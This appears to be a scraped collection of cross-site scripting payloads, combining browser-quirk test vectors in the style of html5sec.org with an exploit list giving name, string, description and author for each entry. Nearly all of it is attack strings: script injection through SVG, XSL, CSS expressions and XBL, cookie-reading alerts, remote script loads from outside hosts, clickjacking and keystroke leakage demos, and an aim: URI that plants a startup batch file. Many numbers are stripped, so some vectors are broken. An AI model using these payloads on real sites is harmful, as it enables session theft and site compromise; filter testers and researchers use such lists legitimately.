<div id=""><div  style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>//["'`-->]]>]</div>

<div id=""><!-- IE - -->

<x '="foo"><x foo='><img src=x onerror=alert()//'>

<!-- IE - -->

<! '="foo"><x foo='><img src=x onerror=alert()//'>

<? '="foo"><x foo='><img src=x onerror=alert()//'>//["'`-->]]>]</div>

<div id=""><embed src="javascript:alert(63)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF

<img src="javascript:alert(2)">

<image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓

<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓//["'`-->]]>]</div>

<div id=""><!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>//["'`-->]]>]</div><div id="65"><svg onload="javascript:alert(65)" xmlns="http://www.w3.org/2000/svg"></svg>//["'`-->]]>]</div>

<div id=""><?xml version="1.0"?>

<?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?>

<root/>//["'`-->]]>]</div>

<div id=""><!DOCTYPE x [

    <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x"

 onerror CDATA "alert(67)"

 onload CDATA "alert(2)">

]><img />//["'`-->]]>]</div>

<div id=""><doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml">

    <html:style /><x xlink:href="javascript:alert(68)" xlink:type="simple">XXX</x>

</doc>//["'`-->]]>]</div>

<div id=""><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(69)"/></onevent><timer value=""/></card>//["'`-->]]>]</div><div id="70"><div style=width:1px;filter:glow onfilterchange=alert(70)>x</div>//["'`-->]]>]</div><div id="71"><// style=x:expression\28alert(71)\29>//["'`-->]]>]</div><div id="72"><form><button formaction="javascript:alert(72)">X</button>//["'`-->]]>]</div><div id="73"><event-source src="event.php" onload="alert(73)">//["'`-->]]>]</div><div id="74"><a href="javascript:alert(74)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>//["'`-->]]>]</div><div id="75"><script<{alert(75)}/></script </>//["'`-->]]>]</div><div id="76"><?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>//["'`-->]]>]</div><div id="77"><?xml-stylesheet type="text/css"?><root style="x:expression(alert(77))"/>//["'`-->]]>]</div><div id="78"><?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>//["'`-->]]>]</div><div id="79"><object allowscriptaccess="always" data="test.swf"></object>//["'`-->]]>]</div><div id="80"><style>*{x:ｅｘｐｒｅｓｓｉｏｎ(alert(80))}</style>//["'`-->]]>]</div><div id="81"><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(81)" xlink:type="simple"/>//["'`-->]]>]</div><div id="82"><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>//["'`-->]]>]</div>

<div id=""><x:template xmlns:x="http://www.wapforum.org/2001/wml"  x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)"><x:timer value=""/></x:template>//["'`-->]]>]</div>

<div id=""><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(84)//#x"/>//["'`-->]]>]</div><div id="85"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>//["'`-->]]>]</div><div id="86"><body oninput=alert(86)><input autofocus>//["'`-->]]>]</div>

<div id=""><svg xmlns="http://www.w3.org/2000/svg">

<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(87)"><rect width="" height="" fill="white"/></a>

</svg>//["'`-->]]>]</div>

<div id=""><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">

<animation xlink:href="javascript:alert(88)"/>

<animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/>

<image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/>

<foreignObject xlink:href="javascript:alert(88)"/>

<foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E"/>

</svg>//["'`-->]]>]</div>

<div id=""><svg xmlns="http://www.w3.org/2000/svg">

<set attributeName="onmouseover" to="alert(89)"/>

<animate attributeName="onunload" to="alert(89)"/>

</svg>//["'`-->]]>]</div>

<div id=""><!-- Up to Opera 10.63 -->

<div style=content:url(test2.svg)></div>

<!-- Up to Opera 11.64 - see link below -->

<!-- Up to Opera .x -->

<div style="background:url(test5.svg)">PRESS ENTER</div>//["'`-->]]>]</div>

<div id="">[A]

<? foo="><script>alert(91)</script>">

<! foo="><script>alert(91)</script>">

</ foo="><script>alert(91)</script>">

[B]

<? foo="><x foo='?><script>alert(91)</script>'>">

[C]

<! foo="[[[x]]"><x foo="]foo><script>alert(91)</script>">

[D]

<% foo><x foo="%><script>alert(91)</script>">//["'`-->]]>]</div>

<div id=""><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="93"><div style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X</div>//["'`-->]]>]</div>

<div id=""><svg xmlns="http://www.w3.org/2000/svg">

<handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert()</handler>

</svg>//["'`-->]]>]</div>

<div id=""><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">

<feImage>

<set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,

PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>

</feImage>

</svg>//["'`-->]]>]</div>

<div id=""><iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>

<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//["'`-->]]>]</div>

<div id=""><!-- IE - -->

<div id=d><x xmlns="><iframe onload=alert(97)"></div>

<script>d.innerHTML+='';</script>

<!-- IE  in IE5- Standards mode -->

<div id=d><x xmlns='"><iframe onload=alert(2)//'></div>

<script>d.innerHTML+='';</script>//["'`-->]]>]</div>

<div id=""><div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div>

<script>with(document.getElementById("d"))innerHTML=innerHTML</script>//["'`-->]]>]</div>

<div id="">XXX<style>

*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */

<!--

--><!--*{color:red}   /* all UA */

*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */

</style>//["'`-->]]>]</div>

<div id=""><img[a][b]src=x[d]onerror[c]=[e]"alert(100)">//["'`-->]]>]</div><div id="101"><a href="[a]java[b]script[c]:alert(101)">XXX</a>//["'`-->]]>]</div><div id="102"><img src="x` `<script>alert(102)</script>"` `>//["'`-->]]>]</div><div id="103"><script>history.pushState(0,0,'/i/am/somewhere_else');</script>//["'`-->]]>]</div>

<div id=""><svg xmlns="http://www.w3.org/2000/svg" id="foo">

<x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/>

</svg>//["'`-->]]>]</div>

<div id=""><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>//["'`-->]]>]</div><div id="106"><img src onerror /" '"= alt=alert(106)//">//["'`-->]]>]</div><div id="107"><title onpropertychange=alert(107)></title><title title=></title>//["'`-->]]>]</div>

<div id=""><!-- IE - standards mode -->

<a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(108)></a>">

<!-- IE - standards mode -->

<!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//">

<?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">//["'`-->]]>]</div>

<div id=""><svg xmlns="http://www.w3.org/2000/svg">

<a id="x"><rect fill="white" width="" height=""/></a>

<rect  fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/>

</svg>//["'`-->]]>]</div>

<div id=""><svg xmlns="http://www.w3.org/2000/svg">

<path d="M0,0" style="marker-start:url(test4.svg#a)"/>

</svg>//["'`-->]]>]</div>

<div id=""><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="112"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div>

<div id=""><div id="x">XXX</div>

<style>

#x{font-family:foo[bar;color:green;}

#y];color:red;{}

</style>//["'`-->]]>]</div>

<div id=""><x style="background:url('x[a];color:red;/*')">XXX</x>//["'`-->]]>]</div>

<div id=""><!--[if]><script>alert()</script -->

<!--[if<img src=x onerror=alert()//]> -->//["'`-->]]>]</div>

<div id=""><div id="x">x</div>

<xml:namespace prefix="t">

<import namespace="t" implementation="#default#time2">

<t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;">//["'`-->]]>]</div>

<div id=""><a href="http://attacker.org">

    <iframe src="http://example.org/"></iframe>

</a>//["'`-->]]>]</div>

<div id=""><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');">

    <h1>Drop me</h1>

</div>

<iframe src="http://www.example.org/dropHere.html"></iframe>//["'`-->]]>]</div>

<div id=""><iframe src="view-source:http://www.example.org/" frameborder="" style="width:400px;height:180px"></iframe>

<textarea type="text" cols="" rows=""></textarea>//["'`-->]]>]</div>

<div id=""><script>

function makePopups(){

    for (i=;i<;i++) {

        window.open('popup.html','spam'+i,'width=50,height=50');

    }

}

</script>

<body>

<a href="#" onclick="makePopups()">Spam</a>//["'`-->]]>]</div>

<div id=""><html xmlns="http://www.w3.org/1999/xhtml"

xmlns:svg="http://www.w3.org/2000/svg">

<body style="background:gray">

<iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/>

<svg:svg>

<svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox">

    <svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/>

    <svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/>

</svg:mask>

</svg:svg>

</body>

</html>//["'`-->]]>]</div>

<div id=""><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>//["'`-->]]>]</div>

<div id=""><span class=foo>Some text</span>

<a class=bar href="http://www.example.org">www.example.org</a>

<script src="http://code.jquery.com/jquery-1.4.4.js"></script>

<script>

$("span.foo").click(function() {

alert('foo');

$("a.bar").click();

});

$("a.bar").click(function() {

alert('bar');

location="http://html5sec.org";

});

</script>//["'`-->]]>]</div>

<div id=""><script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10

<script src="\\example.com\foo.js"></script> // Safari 5.0//["'`-->]]>]</div>

<div id=""><?xml version="1.0"?>

<?xml-stylesheet type="text/xml" href="#stylesheet"?>

<!DOCTYPE doc [

<!ATTLIST xsl:stylesheet

  id    ID    #REQUIRED>]>

<svg xmlns="http://www.w3.org/2000/svg">

    <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

        <xsl:template match="/">

            <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(125)"></iframe>

        </xsl:template>

    </xsl:stylesheet>

    <circle fill="red" r=""></circle>

</svg>//["'`-->]]>]</div>

<div id=""><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>

<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(126)" style="behavior:url(#x);"><param name=postdomevents /></object>//["'`-->]]>]</div>

<div id=""><svg xmlns="http://www.w3.org/2000/svg" id="x">

<listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/>

<handler id="y">alert()</handler>

</svg>//["'`-->]]>]</div>

<div id=""><svg><style>&lt;img/src=x onerror=alert()// </b>//["'`-->]]>]</div>

<div id=""><svg>

<image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>")'>

<!--

Same effect with

<image filter='...'>

-->

</svg>//["'`-->]]>]</div>

<div id=""><math href="javascript:alert(130)">CLICKME</math>

<math>

<!-- up to FF  -->

<maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction>

<!-- FF + -->

<maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction>

</math>//["'`-->]]>]</div>

<div id=""><b>drag and drop one of the following strings to the drop box:</b>

<br/><hr/>

jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//

<br/><hr/>

feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//

<br/><hr/>

feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>

<br/><hr/>

feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//

<br/><hr/>

<div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>//["'`-->]]>]</div>

<div id=""><!doctype html>

<form>

<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>

<br>

<input name="secret" type="password">

</form>

<!-- injection --><svg height="50px">

<image xmlns:xlink="http://www.w3.org/1999/xlink">

<set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" />

<set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" />

<set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" />

<set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" />

</image>

</svg>//["'`-->]]>]</div>

<div id=""><!-- `<img/src=xx:xx onerror=alert()//--!>//["'`-->]]>]</div>

<div id=""><xmp>

<%

</xmp>

<img alt='%></xmp><img src=xx:x onerror=alert(134)//'>

<script>

x='<%'

</script> %>/

alert()

</script>

XXX

<style>

*['<!--']{}

</style>

-->{}

*{color:red}</style>//["'`-->]]>]</div>

<div id=""><?xml-stylesheet type="text/xsl" href="#" ?>

<stylesheet xmlns="http://www.w3.org/TR/WD-xsl">

<template match="/">

<eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert()</eval>

<if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if>

</template>

</stylesheet>//["'`-->]]>]</div>

<div id=""><form action="" method="post">

<input name="username" value="admin" />

<input name="password" type="password" value="secret" />

<input name="injected" value="injected" dirname="password" />

<input type="submit">

</form>//["'`-->]]>]</div>

<div id=""><svg>

<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?">

<circle r=""></circle>

<animate attributeName="xlink:href" begin="" from="javascript:alert(137)" to="&" />

</a>//["'`-->]]>]</div>

<div id=""><link rel="import" href="test.svg" />//["'`-->]]>]</div><div id="139"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;" />//["'`-->]]>]</div>undefined

A very short cross browser header injection

Exploit Name: A very short cross browser header injection

Exploit String: with(document)getElementsByTagName('head')[].appendChild(createElement('script')).src='//ŋ.ws'

Exploit Description: This vector shows one of the shortest possible ways to inject external JavaScript into a website's header area.

Exploit Tags: xss, short, header, injection

Author Name: .mario

Add onclick event hadler

Exploit Name: Add onclick event hadler

Exploit String: onclick=eval/**/(/ale/.source%2b/rt/.source%2b/()/.source);

Exploit Description: This vector adds an onclick event handler to a tag and appends an obfuscated JS alert.

Exploit Tags: general, JS breaking, basic, obfuscated, user interaction

Author Name: kishor

Advanced HTML injection locator

Exploit Name: Advanced HTML injection locator

Exploit String: <s><s>%3cs%3e111%3c/s%3e%3c%%3e%%%%3c%2f%%3e&#&#&#&#&#&#&#&#&#&#&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e

Exploit Description: This vector indicates HTML injections by stroked text.

Exploit Tags: general, html breaking, injection

Author Name: .mario

Advanced XSS Locator

Exploit Name: Advanced XSS Locator

Exploit String: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert()</SCRIPT>=&{}");}alert(6);function xss(){//

Exploit Description: Advanced XSS Locator

Exploit Tags: general, html breaking, comment breaking, JS breaking

Author Name: .mario

Advanced XSS Locator for title-Injections

Exploit Name: Advanced XSS Locator for title-Injections

Exploit String: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert()</SCRIPT>=&{</title><script>alert()</script>}");}

Exploit Description: This is a modified version of the XSS Locator from ha.ckers.org especially crafted to check for title injections.

Exploit Tags: general, html breaking, comment breaking, JS breaking, title breaking

Author Name: .mario

aim: uri exploit

Exploit Name: aim: uri exploit

Exploit String: aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"

Exploit Description: This aim-uri executes the calc.exe on vulnerable systems

Exploit Tags: URI exploits, gecko, injection, general

Author Name: xs-sniper

Backslash-obfuscated XBL injection - variant

Exploit Name: Backslash-obfuscated XBL injection - variant

Exploit String: <div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL.

Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated

Author Name: thespanner.co.uk

Backslash-obfuscated XBL injection - variant

Exploit Name: Backslash-obfuscated XBL injection - variant

Exploit String: <div/style=&#&#&#&#&#&#&#&#&#&

#&#&#&#&#&#&#&#&#&#&#:&

#&#&#&#&#&#&#&#&#&#&#&

#&#&#&#&#&#&#&#&#&#&#&

#&#&#&#&#&#&#&#&#&#&#

&#&#&#&#&#&#&#&#&#&#&#

&#&#&#&#&#&#&#&#&#&#&>

Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. All important characters are obfuscated by unclosed entities.

Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated

Author Name: thespanner.co.uk

Backslash-obfuscated XBL injection - variant

Exploit Name: Backslash-obfuscated XBL injection - variant

Exploit String: <Q%^&*(£@!’” style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. As we can see gecko based browsers accept various characters as valid tags.

Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated

Author Name: thespanner.co.uk

Backslash-obfuscated XBL injection - variant

Exploit Name: Backslash-obfuscated XBL injection - variant

Exploit String: <div&nbsp &nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. Furthermore unclosed NBSP entities are used to obfuscate the string.

Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated

Author Name: thespanner.co.uk

Backslash-obfuscated XBL injection - variant

Exploit Name: Backslash-obfuscated XBL injection - variant

Exploit String: <x/style=-m\0o\0z\-b\0i\0nd\0i\0n\0g\:\0u\0r\0l\(\/\/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\.c\0o\.\0u\0k\/\0la\0b\0s\/\0x\0b\0l\/\0x\0b\0l\.\0x\0m\0l\#\0x\0s\0s\)>

Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. Between any character of the original payload null bytes are used to obfuscate.

Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated

Author Name: thespanner.co.uk

BASE

Exploit Name: BASE

Exploit String: <BASE HREF="javascript:alert('XSS');//">

Exploit Description: Works in IE and Netscape 8.1 in safe mode.  You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render.  Also, this relies on the fact that the website uses dynamically placed images like ”images/image.jpg” rather than full paths.  If the path includes a leading forward slash like ”/images/image.jpg” you can remove one slash from this vector (as long as there are two to begin the comment this will work

Exploit Tags: general, evil tags

Author Name: ha.ckers.org

Basic back ticked attribute breaker

Exploit Name: Basic back ticked attribute breaker

Exploit String: `> <script>alert()</script>

Exploit Description: This vector breaks back ticked attributes.

Exploit Tags: general, html breaking, basic

Author Name: kishor

Basic double quoted attribute breaker

Exploit Name: Basic double quoted attribute breaker

Exploit String: > <script>alert()</script>

Exploit Description: This vector breaks double quoted attributes and produces an alert.

Exploit Tags: general, html breaking

Author Name: kishor

Basic JS breaker

Exploit Name: Basic JS breaker

Exploit String: xyz onerror=alert();

Exploit String: ;a=eval;b=alert;a(b(/c/.source));

Exploit String: ];a=eval;b=alert;a(b());//

Exploit String: ];a=eval;b=alert;a(b());//

Exploit String: '];a=eval;b=alert;a(b(15));//

Exploit String: };a=eval;b=alert;a(b());//

Exploit String: '};a=eval;b=alert;a(b(13));//

Exploit String: };a=eval;b=alert;a(b());//

Exploit String: a=;a=eval;b=alert;a(b());//

Exploit String: ;//%0da=eval;b=alert;a(b(10));//

Exploit String: ';//%0da=eval;b=alert;a(b(9));//

Exploit String: '> <script>alert(3)</script>

Exploit String: </title><script>alert()</script>

Exploit String: <BGSOUND SRC="javascript:alert('XSS');">

Exploit String: <BODY BACKGROUND="javascript:alert('XSS');">

Exploit String: <BODY ONLOAD=alert('XSS')>

Exploit String: <!--

<A href="

- --><a href=javascript:alert:document.domain

>test-->

Exploit String: <IMG SRC=JaVaScRiPt:alert('XSS')>

Exploit String: <%3C&lt&lt;&LT&LT;&#&#&#&#&#&#&#;&#;&#;&#;&#;&#;&#x3c&#x03c&#x003c&#x0003c&#x00003c&#x000003c<<<<<<&#X3c&#X03c&#X003c&#X0003c&#X00003c&#X000003c<<<<<<&#x3C&#x03C&#x003C&#x0003C&#x00003C&#x000003C<<<<<<&#X3C&#X03C&#X003C&#X0003C&#X00003C&#X000003C<<<<<&#X000003C;\x3c\x3C\u003c\u003C

Exploit String: <script>

var a = "</script> <script> alert('XSS !'); </script> <script>";

</script>

Exploit String: <!--[if gte IE ]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->

Exploit String: */a=eval;b=alert;a(b(/e/.source));/*

Exploit String: width: expression((window.r==document.cookie)?'':alert(r=document.cookie))

Exploit String: <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>

Exploit String: <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

Exploit String: <DIV STYLE="background-image: url(javascript:alert('XSS'))">

Exploit String: <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

Exploit String: <DIV STYLE="width: expression(alert('XSS'));">

Exploit String: <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<IFRAME SRC=http://ha.ckers.org/scriptlet.html <

<A HREF="http://1113982867/">XSS</A>

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

<IMG SRC="jav
ascript:alert('XSS');">

<IMG SRC="jav	ascript:alert('XSS');">

<IMG SRC="jav
ascript:alert('XSS');">

<IMG SRC="javascript:alert('XSS');">

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

\";alert('XSS');//

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

eval(name)

<A HREF="http://www.google.com./">XSS</A>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<A HREF="//google">XSS</A>

<A HREF="http://ha.ckers.org@google">XSS</A>

<A HREF="http://google:ha.ckers.org">XSS</A>

firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<IMG SRC=`javascript:alert("RSnake says### 'XSS'")`>

<IMG SRC="javascript:alert('XSS')"

<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

Exploit String: <IMG SRC=javascript:alert(&quot;XSS&quot;)>

'';!--"<script>alert(0);</script>=&{(alert(1))}

<?xml version="1.0"?>

<html:html xmlns:html='http://www.w3.org/1999/xhtml'>

<html:script>

alert(document.cookie);

</html:script>

</html:html>

<img src=`x` onrerror= ` ;; alert() ` />

</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">

style=color: expression(alert());" a="

vbscript:Execute(MsgBox(chr()&chr()&chr()))<

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

a=<a>

<b>

%3c%%6d%%2f%%%%3d%

%%6f%6e%%%%6f%%3d%%6c%%%%%%%3e

</b>

</a>

document.write(unescape(a..b))

<IMG SRC="jav	ascript:alert(<WBR>'XSS');">

<IMG SRC="jav
ascript:alert(<WBR>'XSS');">

<IMG SRC="jav
ascript:alert(<WBR>'XSS');">

<IMG SRC=javascript:alert(String.fromCharCode(######))>

<IMG DYNSRC="javascript:alert('XSS');">

<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

Redirect  /a.jpg http://victimsite.com/admin.asp&deleteuser

<IMG LOWSRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

exp/*<XSS STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC='vbscript:msgbox("XSS")'>

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<A HREF="http://66.102.7.147/">XSS</A>

s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1

s1=?'':'i'; s2=?'':'fr'; s3=?'':'ame'; i1=s1+s2+s3; s1=?'':'jav'; s2=?'':'ascr'; s3=?'':'ipt'; s4=?'':':'; s5=?'':'ale'; s6=?'':'rt'; s7=?'':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7;

s1=?'':'i';s2=?'':'fr';s3=?'':'ame';i1=s1+s2+s3;s1=?'':'jav';s2=?'':'ascr';s3=?'':'ipt';s4=?'':':';s5=?'':'ale';s6=?'':'rt';s7=?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);

s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)'];

s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+''];

s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7;

s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+'';

<BR SIZE="&{alert('XSS')}">

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

%0da=eval;b=alert;a(b(/d/.source));

<a href          =              "javas  cript   :ale                            rt(1)">test

+alert()+

<body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_();;;;

<body onload=a1={x:this.parent.document};a1.x.writeln();>

<body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write();;;;

<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

<IMG SRC="livescript:[code]">

<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">

<IMG SRC=&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

